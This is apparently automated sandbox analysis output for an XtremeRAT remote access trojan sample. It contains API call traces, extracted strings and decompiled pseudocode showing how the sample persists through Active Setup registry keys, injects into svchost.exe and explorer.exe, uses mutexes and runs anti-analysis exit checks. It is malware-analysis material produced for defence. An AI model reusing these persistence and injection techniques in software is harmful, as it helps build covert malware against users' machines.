Sleep.KERNEL32(000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(0000017C,00000000,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,00C30000,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(019E0000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(019E0000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000,00000000,019E0000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000,00000000,019E0000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(019E0000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Part of subcall function 00C89840: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89855
Part of subcall function 00C89840: RegQueryValueExW.ADVAPI32(?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89876
Part of subcall function 00C89840: RegCloseKey.ADVAPI32(00000000,?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C8988C

Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(user32.dll), ref: 00C898EA
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C898F4
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(shell32.dll), ref: 00C898FE
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C89908
Part of subcall function 00C898DC: MessageBoxW.USER32(00000000,?,?,00000000), ref: 00C899C3

Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88934
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C8894D
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88966
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C8897F
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88998
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889B1
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889CA
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889E3
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889FC
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A15
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A2E
Part of subcall function 00C88918: GetTickCount.KERNEL32(00000000), ref: 00C88A40
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A57
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A6C
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A81
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A96
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AAB
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AC0
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AD5
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AEA
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AFF
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B14
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B29
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B3E
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B53
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B68
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B78
Part of subcall function 00C88918: GetTickCount.KERNEL32(00000000), ref: 00C88B8B
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88BB2

Strings

Software\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A133
XTREME, xrefs: 00C8A42F
5/3/2018 10:11:44 AM, xrefs: 00C89ED9, 00C89EE3
.cfg, xrefs: 00C89D01
svchost.exe, xrefs: 00C8A196
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.cfg, xrefs: 00C89ECD, 00C8A3A6
C:\Windows\InstallDir\Server.exe, xrefs: 00C8A107
CONFIG, xrefs: 00C89CB4, 00C89D77, 00C89DFB, 00C89E43
svchost.exe, xrefs: 00C89F3E, 00C89F4A, 00C8A1A5, 00C8A1C2, 00C8A1D7, 00C8A40F, 00C8A420
local, xrefs: 00C8A3EF
SOFTWARE\, xrefs: 00C8A472
C:\Windows\InstallDir\, xrefs: 00C8A156
SOFTWARE\XtremeRAT, xrefs: 00C89CC8
explorer.exe, xrefs: 00C8A383
DSma9HnKaPERSIST, xrefs: 00C8A16F
{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A117
DSma9HnKa, xrefs: 00C89CF3, 00C89E72, 00C89EEA, 00C8A0C8
SOFTWARE\, xrefs: 00C89EEF, 00C8A0CD
.xtr, xrefs: 00C8A3C2
DSma9HnKa, xrefs: 00C8A3B0, 00C8A44B
%DEFAULTBROWSER%, xrefs: 00C8A208
ServerStarted, xrefs: 00C89EFB
Mutex, xrefs: 00C8A489
InstalledServer, xrefs: 00C8A0D9
\Microsoft\Windows\, xrefs: 00C89CDC
XTREMEUPDATE, xrefs: 00C89C5A
open, xrefs: 00C89C47

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C89BA4, Relevance: 96.9, APIs: 37, Strings: 18, Instructions: 676
sleep

C-Code - Quality: 79%

			_entry_(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v24;
				char _v6196;
				char _v6200;
				char _v6204;
				char _v6208;
				char _v6212;
				char _v6216;
				char* _t37;
				void* _t45;
				long _t46;
				void* _t59;
				void* _t67;
				void* _t80;
				void* _t96;
				intOrPtr _t138;
				intOrPtr* _t139;
				intOrPtr _t141;
				intOrPtr* _t142;
				void* _t149;
				long _t150;
				int* _t161;
				int* _t166;
				int* _t172;
				intOrPtr* _t185;
				intOrPtr* _t199;
				void* _t222;
				WCHAR* _t235;
				void* _t274;
				void* _t298;
				void* _t306;
				WCHAR* _t340;
				signed int _t343;
				void* _t378;
				void* _t381;
				intOrPtr _t391;
				intOrPtr _t416;
				intOrPtr _t418;
				intOrPtr* _t422;
				intOrPtr _t426;
				intOrPtr* _t428;
				intOrPtr _t452;
				void* _t453;
				intOrPtr _t454;
				void* _t465;
				WCHAR* _t471;
				void* _t476;
				intOrPtr _t477;
				void* _t479;
				void* _t481;
				void* _t482;
				intOrPtr _t484;
				intOrPtr _t485;
				void* _t503;

				_t475 = __esi;
				_t336 = __ebx;
				_t481 = _t482;
				_push(__eax);
				_t484 = _t482 + 0xffffffffffffe7c0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v6212 = 0;
				_v6216 = 0;
				_v6208 = 0;
				_v6204 = 0;
				_v6200 = 0;
				_v24 = 0;
				E00C82504(0xc89af0);
				_push(_t481);
				_push(0xc8a62b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t484;
				E00C81618(0xc89b88);
				_t37 =  *0xc8b108; // 0xc8b018
				 *_t37 = 1;
				SetErrorMode(0x8007); // executed
				Sleep(0x64); // executed
				E00C81C90( &_v24, E00C83420(1, __ebx, __esi));
				_t391 =  *0xc8b0d4; // 0x2ad9f4
				E00C81DBC(_v24, _t391);
				if(0 == 0) {
					ShellExecuteW(0, L"open", E00C83420(0, __ebx, _t475), 0, 0, 0);
					ExitProcess(0);
				}
				_t45 = E00C8263C(0, 0, L"XTREMEUPDATE"); // executed
				_t465 = _t45;
				_t46 = GetLastError();
				_t490 = _t46 - 0xb7;
				if(_t46 == 0xb7) {
					Sleep(0x1770);
				}
				CloseHandle(_t465);
				E00C8291C();
				E00C83FDC(0,  &_v6196);
				_t476 =  &_v6196;
				memcpy(0xc8e07c, _t476, 0x607 << 2);
				_t485 = _t484 + 0xc;
				_t468 = _t476 + 0xc0e;
				E00C82B90(0xc8e07c, _t336, L"CONFIG", 0x181c, _t476 + 0xc0e, _t476, _t490);
				SHDeleteKeyW(0x80000001, L"SOFTWARE\\XtremeRAT"); // executed
				_t337 = E00C833A8(E00C8310C(), L"\\Microsoft\\Windows\\", _t490);
				_t59 = E00C834C4(_t57);
				_t491 = _t59 - 1;
				if(_t59 != 1) {
					_t340 = E00C833A8(E00C833A8(E00C833A8(E00C8310C(), "\\", __eflags), 0xc8f38c, __eflags), L".cfg", __eflags);
				} else {
					_t340 = E00C833A8(E00C833A8(_t337, 0xc8f38c, _t491), L".cfg", _t491);
				}
				_t67 = E00C835B0(_t340);
				_t492 = _t67;
				if(_t67 != 0) {
					SetFileAttributesW(_t340, 0x80);
					 *0xc8f8a0 = E00C835DC(_t340, 0xc8f8a8);
					 *0xc8f8a4 = 0xc8f8a8;
					E00C83674(_t340);
					E00C82B90( *0xc8f8a8, _t340, L"CONFIG",  *0xc8f8a0, _t468, _t476, _t492);
					E00C8291C();
					E00C82914(0xc8e07c,  *0xc8f8a8);
					if( *0xc8f690 != 0x1e240) {
						SetFileAttributesW(_t340, 0x80);
						DeleteFileW(_t340);
						E00C8291C();
						E00C83FDC(0,  &_v6196);
						_t476 =  &_v6196;
						memcpy(0xc8e07c, _t476, 0x607 << 2);
						_t485 = _t485 + 0xc;
						_t468 = _t476 + 0xc0e;
						E00C82B90(0xc8e07c, _t340, L"CONFIG", 0x181c, _t476 + 0xc0e, _t476, 0);
					}
				}
				SetFileAttributesW(_t340, 0x80); // executed
				DeleteFileW(_t340); // executed
				 *0xc8f8a8 = E00C81100(0x181c);
				E00C82914( *0xc8f8a8, 0xc8e07c);
				E00C82B90( *0xc8f8a8, _t340, L"CONFIG", 0x181c, _t468, _t476, 0);
				E00C83218(_t340,  *0xc8f8a8, 0x181c, 0); // executed
				E00C83674(_t340);
				_t80 = E00C8263C(0, 0, 0xc8f38c); // executed
				 *0xc8f8b0 = _t80;
				if(GetLastError() == 0xb7) {
					ExitProcess(0);
				}
				_t477 =  *0xc8f414;
				if(_t477 <= 0) {
					L14:
					E00C81C90( &_v6200, _t340);
					E00C81D04(_v6200);
					E00C82914(0xc918fc, _t340);
					E00C89790(0xc8f8b4);
					_t405 = E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t497);
					E00C82F90(0x80000001, _t91, _t497, 2, 0xc8f8b4); // executed
					if( *0xc8f5bc == 1) {
						E00C88918(_t405, _t468, 0xc8fccc);
					}
					if( *0xc8f5c9 == 1) {
						_t306 = E00C89840();
						_t500 = _t306;
						if(_t306 == 0) {
							E00C898DC(0xc8e07c);
						}
					}
					GetModuleFileNameW(0, 0xc8fac0, 0x20a);
					_t96 = E00C84914(0xc8fac0, _t340, 0xc8e07c, _t468, _t477); // executed
					_t341 = _t96;
					E00C84B88(_t96, 0xc8e07c);
					 *0xc8f898 = E00C833A8(_t96, 0xc8a704, _t500);
					_t501 =  *0xc8f2b1 - 1;
					if( *0xc8f2b1 == 1) {
						SetFileAttributesW( *0xc8f898, 0x80); // executed
						SetFileAttributesW(E00C836D8( *0xc8f898, _t501), 0x80); // executed
						E00C81248();
						_push(_t481);
						_push(0xc8a01f);
						_push( *[fs:eax]);
						 *[fs:eax] = _t485;
						_push(E00C812A4(0x1b) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xb) + 1);
						_t274 = E00C812A4(6);
						_pop(_t378); // executed
						E00C83BC4( *0xc8f898, _t341, _t378, _t274 + 0x7d1); // executed
						_pop(_t452);
						 *[fs:eax] = _t452;
						_push(_t481);
						_push(0xc8a09d);
						_push( *[fs:eax]);
						 *[fs:eax] = _t485;
						_push(E00C812A4(0x1b) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xb) + 1);
						_push(E00C812A4(6) + 0x7d1);
						_t298 = E00C836D8( *0xc8f898, _t501);
						_pop(_t453);
						_pop(_t381); // executed
						E00C83BC4(_t298, _t341, _t381, _t453); // executed
						_pop(_t454);
						 *[fs:eax] = _t454;
						E00C83674( *0xc8f898);
						E00C83674(E00C836D8( *0xc8f898, _t501));
					}
					E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t501), _t501, 2,  *0xc8f898); // executed
					memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
					_t471 = 0xc8ec8a;
					E00C82E48( *0xc8f898);
					E00C82914(0xc914e8,  *0xc8f898);
					E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t501));
					E00C82914(0xc91b06, _t112);
					_t343 = E00C836D8( *0xc8f898, _t501);
					E00C82E48(_t343);
					E00C82914(0xc916f2, _t343);
					if( *0xc8f38a == 1) {
						_t235 = E00C8263C(0, 0, 0xc8f3da); // executed
						_t471 = _t235;
						_t503 = GetLastError() - 0xb7;
						if(_t503 == 0) {
							CloseHandle(_t471);
						} else {
							CloseHandle(_t471);
							 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t503);
							E00C8291C();
							E00C82E48( *0xc8f89c);
							E00C82914(0xc8fac0,  *0xc8f89c);
							 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t481);
							E00C83CE4( *0xc8f8ac, 0xc8fccc, E00C88EF8);
						}
					}
					E00C81CD8( &_v6204, 0x11, 0xc8f2b2);
					_t416 =  *0xc8b0dc; // 0x2ad9cc
					E00C81DBC(_v6204, _t416);
					if(_t503 != 0) {
						E00C81CD8( &_v6208, 0x11, 0xc8f2b2);
						_t418 =  *0xc8b0d8; // 0x2a7934
						E00C81DBC(_v6208, _t418);
						if(__eflags != 0) {
							 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t481);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								_t222 = E00C83A54( *0xc8f89c, 0xc8f8ac);
								__eflags = _t222;
								if(_t222 != 0) {
									 *0xc8f89c = E00C83B10( *0xc8f8ac);
								} else {
									 *0xc8f89c = E00C83094();
								}
								 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t481);
								__eflags =  *0xc8f8ac;
								if(__eflags == 0) {
									 *0xc8f89c = E00C83094();
									 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t481);
								}
							}
						} else {
							 *0xc8f89c = E00C83094();
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t481);
						}
					} else {
						 *0xc8f8ac = 0;
					}
					_t479 = 0;
					 *0xc8f8a8 = 0;
					_t504 =  *0xc8f2b0;
					if( *0xc8f2b0 != 0) {
						_t343 =  *0xc8f898;
						_t471 = E00C833A8(E00C83420(0, _t343, 0), 0xc8a704, _t504);
						if(E00C83960(_t343, E00C82E48(_t343), _t471) == 0) {
							SetFileAttributesW(_t471, 0x80);
							_t506 = E00C82E48(_t471) + _t214;
							E00C82914(0xc91d10, _t471);
							E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t471) + _t214), 0xc91f1c, _t481), 0xc91d10, E00C897F4);
						}
					}
					_t138 = E00C833A8(E00C836D8(0xc918fc, _t506), 0xc90fdc, _t506);
					_t422 =  *0xc8b0f0; // 0xc8e01c
					 *_t422 = _t138;
					_t139 =  *0xc8b0f0; // 0xc8e01c
					_t141 = E00C833A8( *_t139, L".xtr", _t506);
					_t424 =  *0xc8b0f0; // 0xc8e01c
					 *_t424 = _t141;
					_t142 =  *0xc8b0f0; // 0xc8e01c
					if(E00C835B0( *_t142) != 0 && E00C87B84(L"local", _t343, _t479) == 1) {
						_t509 =  *0xc8f8ac;
						if( *0xc8f8ac == 0) {
							GetModuleFileNameW(0, 0xc8fac0, 0x20a);
							 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t481);
						}
						_t428 =  *0xc8b0e4; // 0xc8e024
						_t185 =  *0xc8b0e8; // 0xc8e020
						E00C82B90( *_t185, _t343, L"XTREME",  *_t428 - 0x1e, _t471, _t479, _t509);
						E00C82E14( &_v6216, L"XTREME", 0, GetCurrentProcessId(), 0);
						E00C81D10( &_v6212, _v6216, L"SOFTWARE\\", _t509);
						E00C82F90(0x80000001, E00C81CF4(_v6212), _t509, 2, 0xc90fdc);
						CloseHandle( *0xc8f8b0);
						_t199 =  *0xc8b0e8; // 0xc8e020
						_t424 = 0;
						E00C84600( *_t199, 0xc8f8ac, 0, 0, 0xc91f1c);
						Sleep(0x3e8);
						ExitProcess(0);
					}
					_t511 =  *0xc8f8ac;
					if( *0xc8f8ac != 0) {
						CloseHandle( *0xc8f8b0);
						while(1) {
							_t425 = E00C88BC0;
							 *0xc8f8a8 = E00C83CE4( *0xc8f8ac, 0xc8fccc, E00C88BC0);
							Sleep(0x1f4); // executed
							__eflags =  *0xc8f8a8;
							if( *0xc8f8a8 == 0) {
								_t172 =  *0xc8b0e0; // 0xc8b000
								TerminateProcess( *0xc8f8ac,  *_t172);
								_t425 = 0xc91f1c;
								 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t481);
							}
							_t479 = _t479 + 1;
							_t149 = E00C8263C(0, 0, 0xc8f38c); // executed
							_t472 = _t149;
							_t150 = GetLastError();
							__eflags = _t150 - 0xb7;
							_t343 = _t343 & 0xffffff00 | _t150 == 0x000000b7;
							CloseHandle(_t149);
							__eflags = _t343;
							if(_t343 == 0) {
								_t166 =  *0xc8b0e0; // 0xc8b000
								TerminateProcess( *0xc8f8ac,  *_t166);
								_t425 = 0xc91f1c;
								 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t481);
							}
							__eflags = _t479 - 7;
							if(_t479 >= 7) {
								break;
							}
							__eflags = _t343 - 1;
							if(_t343 != 1) {
								continue;
							}
							break;
						}
						E00C840F8(0xc8e07c, _t343, _t425, _t472, _t479); // executed
						__eflags =  *0xc8f8a8;
						if(__eflags == 0) {
							_t161 =  *0xc8b0e0; // 0xc8b000
							TerminateProcess( *0xc8f8ac,  *_t161);
							E00C88BC0(_t343, _t472, _t479, __eflags, 0xc8fccc);
						}
						__eflags = _t479 - 7;
						if(_t479 >= 7) {
							__eflags = _t343;
							if(_t343 == 0) {
								ShellExecuteW(0, L"open",  *0xc8f898, 0, 0, 0);
							}
						}
						goto L59;
					} else {
						CloseHandle( *0xc8f8b0);
						E00C840F8(0xc8e07c, _t343, _t424, _t471, _t479);
						E00C88BC0(_t343, _t471, _t479, _t511, 0xc8fccc);
						L59:
						_pop(_t426);
						 *[fs:eax] = _t426;
						_push(0xc8a632);
						E00C81B90( &_v6216, 5);
						return E00C81B78( &_v24);
					}
				} else {
					do {
						Sleep(0x3e8);
						_t477 = _t477 - 1;
						_t497 = _t477;
					} while (_t477 > 0);
					goto L14;
				}
			}

0x00c89ba4
0x00c89ba4
0x00c89ba5
0x00c89bad
0x00c89bae
0x00c89bb4
0x00c89bb5
0x00c89bb6
0x00c89bb9
0x00c89bbf
0x00c89bc5
0x00c89bcb
0x00c89bd1
0x00c89bd7
0x00c89bdf
0x00c89be6
0x00c89be7
0x00c89bec
0x00c89bef
0x00c89bf7
0x00c89bfc
0x00c89c01
0x00c89c09
0x00c89c10
0x00c89c24
0x00c89c2c
0x00c89c32
0x00c89c37
0x00c89c4e
0x00c89c55
0x00c89c55
0x00c89c63
0x00c89c68
0x00c89c6a
0x00c89c6f
0x00c89c74
0x00c89c7b
0x00c89c7b
0x00c89c81
0x00c89c90
0x00c89c9d
0x00c89ca2
0x00c89cb2
0x00c89cb2
0x00c89cb2
0x00c89cc3
0x00c89cd2
0x00c89ce6
0x00c89cea
0x00c89cef
0x00c89cf1
0x00c89d3c
0x00c89cf3
0x00c89d0d
0x00c89d0d
0x00c89d40
0x00c89d45
0x00c89d47
0x00c89d53
0x00c89d64
0x00c89d6a
0x00c89d72
0x00c89d87
0x00c89d96
0x00c89dab
0x00c89dba
0x00c89dc2
0x00c89dc8
0x00c89dd7
0x00c89de4
0x00c89de9
0x00c89df9
0x00c89df9
0x00c89df9
0x00c89e0a
0x00c89e0a
0x00c89dba
0x00c89e15
0x00c89e1b
0x00c89e2a
0x00c89e3e
0x00c89e52
0x00c89e66
0x00c89e6d
0x00c89e7b
0x00c89e80
0x00c89e8f
0x00c89e93
0x00c89e93
0x00c89e98
0x00c89ea0
0x00c89eb1
0x00c89eb9
0x00c89ec4
0x00c89ed4
0x00c89ede
0x00c89ef9
0x00c89f05
0x00c89f11
0x00c89f18
0x00c89f18
0x00c89f24
0x00c89f26
0x00c89f2b
0x00c89f2d
0x00c89f34
0x00c89f34
0x00c89f2d
0x00c89f45
0x00c89f54
0x00c89f59
0x00c89f62
0x00c89f73
0x00c89f78
0x00c89f7f
0x00c89f90
0x00c89fa5
0x00c89faa
0x00c89fb1
0x00c89fb2
0x00c89fb7
0x00c89fba
0x00c89fc8
0x00c89fd4
0x00c89fe0
0x00c89fec
0x00c89ff8
0x00c89ffe
0x00c8a00f
0x00c8a010
0x00c8a017
0x00c8a01a
0x00c8a02b
0x00c8a02c
0x00c8a031
0x00c8a034
0x00c8a042
0x00c8a04e
0x00c8a05a
0x00c8a066
0x00c8a072
0x00c8a081
0x00c8a087
0x00c8a08c
0x00c8a08d
0x00c8a08e
0x00c8a095
0x00c8a098
0x00c8a0ac
0x00c8a0bb
0x00c8a0bb
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0fe
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a178
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b9
0x00c8a1cd
0x00c8a1e1
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a53e
0x00c8a543
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a58d
0x00c8a592
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a
0x00c89ea2
0x00c89ea2
0x00c89ea7
0x00c89eac
0x00c89ead
0x00c89ead
0x00000000
0x00c89ea2

APIs

Part of subcall function 00C82504: GetModuleHandleA.KERNEL32(00000000,?,00C89BE4), ref: 00C82510

SetErrorMode.KERNEL32(00008007,00000000,00C8A62B), ref: 00C89C09
Sleep.KERNEL32(00000064,00008007,00000000,00C8A62B), ref: 00C89C10

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C89C4E
ExitProcess.KERNEL32(00000000,00000064,00008007,00000000,00C8A62B), ref: 00C89C55

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89C6A
Sleep.KERNEL32(00001770,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89C7B
CloseHandle.KERNEL32(00000000), ref: 00C89C81

Part of subcall function 00C83FDC: FindResourceW.KERNEL32(00C80000,00000000,0000000A), ref: 00C83FF3
Part of subcall function 00C83FDC: SizeofResource.KERNEL32(00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84001
